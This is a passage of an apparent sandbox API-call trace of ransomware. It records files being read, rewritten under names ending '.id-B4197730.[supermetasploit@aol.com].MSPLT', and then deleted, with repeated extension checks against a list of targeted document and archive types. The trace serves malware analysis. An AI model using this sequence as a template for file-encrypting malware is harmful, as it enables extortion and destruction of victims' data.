[0172.447] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.447] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0172.448] SetEndOfFile (hFile=0x384) returned 1 [0172.448] CloseHandle (hObject=0x384) returned 1 [0172.455] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.455] SetEndOfFile (hFile=0x378) returned 1 [0172.456] CloseHandle (hObject=0x378) returned 1 [0172.456] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.457] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3076\\setupresources.dll")) returned 1 [0172.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.457] lstrlenW (lpString=".doc") returned 4 [0172.457] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.457] lstrlenW (lpString=".docx") returned 5 [0172.457] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.457] lstrlenW (lpString=".pdf") returned 4 [0172.457] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.457] lstrlenW (lpString=".xls") returned 4 [0172.457] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.457] lstrlenW (lpString=".xlsx") returned 5 [0172.457] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.457] lstrlenW (lpString=".ppt") returned 4 [0172.457] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.457] lstrlenW (lpString=".zip") returned 4 [0172.458] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString=".rar") returned 4 [0172.458] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString=".bz2") returned 4 [0172.458] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.458] lstrlenW (lpString=".7z") returned 3 [0172.458] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.458] lstrlenW (lpString=".dbf") returned 4 [0172.458] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.458] lstrlenW (lpString=".1cd") returned 4 [0172.458] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.458] lstrlenW (lpString=".jpg") returned 4 [0172.458] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.458] lstrlenW (lpString=".doc") returned 4 [0172.458] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString=".docx") returned 5 [0172.458] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0172.458] lstrlenW (lpString=".pdf") returned 4 [0172.458] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString=".xls") returned 4 [0172.458] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0172.458] lstrlenW (lpString=".xlsx") returned 5 [0172.459] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0172.459] lstrlenW (lpString=".ppt") returned 4 [0172.459] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0172.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.459] lstrlenW (lpString=".zip") returned 4 [0172.459] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0172.459] lstrlenW (lpString=".rar") returned 4 [0172.459] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0172.459] lstrlenW (lpString=".bz2") returned 4 [0172.459] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0172.459] lstrlenW (lpString=".7z") returned 3 [0172.459] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0172.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.459] lstrlenW (lpString=".dbf") returned 4 [0172.459] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0172.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.459] lstrlenW (lpString=".1cd") returned 4 [0172.459] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0172.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned 45 [0172.459] lstrlenW (lpString=".jpg") returned 4 [0172.459] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0172.459] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.459] lstrlenW (lpString="Rotate1.ico") returned 11 [0172.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.461] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0172.461] CloseHandle (hObject=0x378) returned 1 [0172.461] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 0x80 [0172.461] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.461] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.461] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.461] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.462] GetLastError () returned 0x0 [0172.462] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0172.464] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0172.465] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.465] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0172.465] SetEndOfFile (hFile=0x384) returned 1 [0172.465] CloseHandle (hObject=0x384) returned 1 [0172.468] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.469] SetEndOfFile (hFile=0x378) returned 1 [0172.470] CloseHandle (hObject=0x378) returned 1 [0172.470] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.470] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico")) returned 1 [0172.470] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.470] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.470] lstrlenW (lpString=".doc") returned 4 [0172.471] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.471] lstrlenW (lpString=".docx") returned 5 [0172.471] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0172.471] lstrlenW (lpString=".pdf") returned 4 [0172.471] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.471] lstrlenW (lpString=".xls") returned 4 [0172.471] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.471] lstrlenW (lpString=".xlsx") returned 5 [0172.471] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0172.471] lstrlenW (lpString=".ppt") returned 4 [0172.471] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.471] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.471] lstrlenW (lpString=".zip") returned 4 [0172.471] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.471] lstrlenW (lpString=".rar") returned 4 [0172.471] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.471] lstrlenW (lpString=".bz2") returned 4 [0172.471] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.471] lstrlenW (lpString=".7z") returned 3 [0172.471] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.471] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.471] lstrlenW (lpString=".dbf") returned 4 [0172.471] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.471] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.471] lstrlenW (lpString=".1cd") returned 4 [0172.471] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.471] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.471] lstrlenW (lpString=".jpg") returned 4 [0172.472] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.472] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.472] lstrlenW (lpString=".doc") returned 4 [0172.472] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0172.472] lstrlenW (lpString=".docx") returned 5 [0172.472] lstrcmpiW (lpString1=".docx", lpString2="1.ico") returned -1 [0172.472] lstrlenW (lpString=".pdf") returned 4 [0172.472] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString=".xls") returned 4 [0172.472] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString=".xlsx") returned 5 [0172.472] lstrcmpiW (lpString1=".xlsx", lpString2="1.ico") returned -1 [0172.472] lstrlenW (lpString=".ppt") returned 4 [0172.472] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.472] lstrlenW (lpString=".zip") returned 4 [0172.472] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString=".rar") returned 4 [0172.472] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0172.472] lstrlenW (lpString=".bz2") returned 4 [0172.472] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0172.472] lstrlenW (lpString=".7z") returned 3 [0172.472] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0172.472] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.472] lstrlenW (lpString=".dbf") returned 4 [0172.472] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0172.472] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.473] lstrlenW (lpString=".1cd") returned 4 [0172.473] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0172.473] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 42 [0172.473] lstrlenW (lpString=".jpg") returned 4 [0172.473] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0172.473] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0172.473] lstrlenW (lpString="Rotate2.ico") returned 11 [0172.473] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.473] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0172.473] CloseHandle (hObject=0x378) returned 1 [0172.473] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 0x80 [0172.474] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.474] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0172.474] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.474] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.474] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.474] GetLastError () returned 0x0 [0172.474] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0172.476] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0172.477] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0172.477] WriteFile (in: hFile=0x384, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0172.478] SetEndOfFile (hFile=0x384) returned 1 [0172.478] CloseHandle (hObject=0x384) returned 1 [0172.481] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.481] SetEndOfFile (hFile=0x378) returned 1 [0172.482] CloseHandle (hObject=0x378) returned 1 [0172.482] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.483] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico")) returned 1 [0173.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.012] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.012] lstrlenW (lpString=".doc") returned 4 [0173.012] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.012] lstrlenW (lpString=".docx") returned 5 [0173.012] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0173.012] lstrlenW (lpString=".pdf") returned 4 [0173.012] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.012] lstrlenW (lpString=".xls") returned 4 [0173.012] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.012] lstrlenW (lpString=".xlsx") returned 5 [0173.012] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0173.013] lstrlenW (lpString=".ppt") returned 4 [0173.013] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".zip") returned 4 [0173.013] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString=".rar") returned 4 [0173.013] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString=".bz2") returned 4 [0173.013] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.013] lstrlenW (lpString=".7z") returned 3 [0173.013] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".dbf") returned 4 [0173.013] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".1cd") returned 4 [0173.013] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".jpg") returned 4 [0173.013] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".doc") returned 4 [0173.013] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0173.013] lstrlenW (lpString=".docx") returned 5 [0173.013] lstrcmpiW (lpString1=".docx", lpString2="2.ico") returned -1 [0173.013] lstrlenW (lpString=".pdf") returned 4 [0173.013] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString=".xls") returned 4 [0173.013] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString=".xlsx") returned 5 [0173.013] lstrcmpiW (lpString1=".xlsx", lpString2="2.ico") returned -1 [0173.013] lstrlenW (lpString=".ppt") returned 4 [0173.013] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0173.013] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.013] lstrlenW (lpString=".zip") returned 4 [0173.013] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0173.014] lstrlenW (lpString=".rar") returned 4 [0173.014] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0173.014] lstrlenW (lpString=".bz2") returned 4 [0173.014] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0173.014] lstrlenW (lpString=".7z") returned 3 [0173.014] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0173.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.014] lstrlenW (lpString=".dbf") returned 4 [0173.014] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0173.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.014] lstrlenW (lpString=".1cd") returned 4 [0173.014] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0173.014] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 42 [0173.014] lstrlenW (lpString=".jpg") returned 4 [0173.014] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0173.014] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0173.014] lstrlenW (lpString="Rotate7.ico") returned 11 [0173.014] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0173.014] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0173.014] CloseHandle (hObject=0x350) returned 1 [0173.014] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 0x80 [0173.015] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0173.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0173.015] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.015] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0173.015] GetLastError () returned 0x0 [0173.015] ReadFile (in: hFile=0x350, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0173.030] WriteFile (in: hFile=0x364, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0173.031] ReadFile (in: hFile=0x350, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0173.031] WriteFile (in: hFile=0x364, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0173.031] SetEndOfFile (hFile=0x364) returned 1 [0173.035] CloseHandle (hObject=0x364) returned 1 [0173.037] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0173.037] SetEndOfFile (hFile=0x350) returned 1 [0173.955] CloseHandle (hObject=0x350) returned 1 [0174.122] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.123] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 1 [0174.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.123] lstrlenW (lpString=".doc") returned 4 [0174.123] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.123] lstrlenW (lpString=".docx") returned 5 [0174.123] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0174.123] lstrlenW (lpString=".pdf") returned 4 [0174.123] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.123] lstrlenW (lpString=".xls") returned 4 [0174.123] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.123] lstrlenW (lpString=".xlsx") returned 5 [0174.123] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0174.123] lstrlenW (lpString=".ppt") returned 4 [0174.123] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.123] lstrlenW (lpString=".zip") returned 4 [0174.123] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.124] lstrlenW (lpString=".rar") returned 4 [0174.124] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.124] lstrlenW (lpString=".bz2") returned 4 [0174.124] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.124] lstrlenW (lpString=".7z") returned 3 [0174.124] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.124] 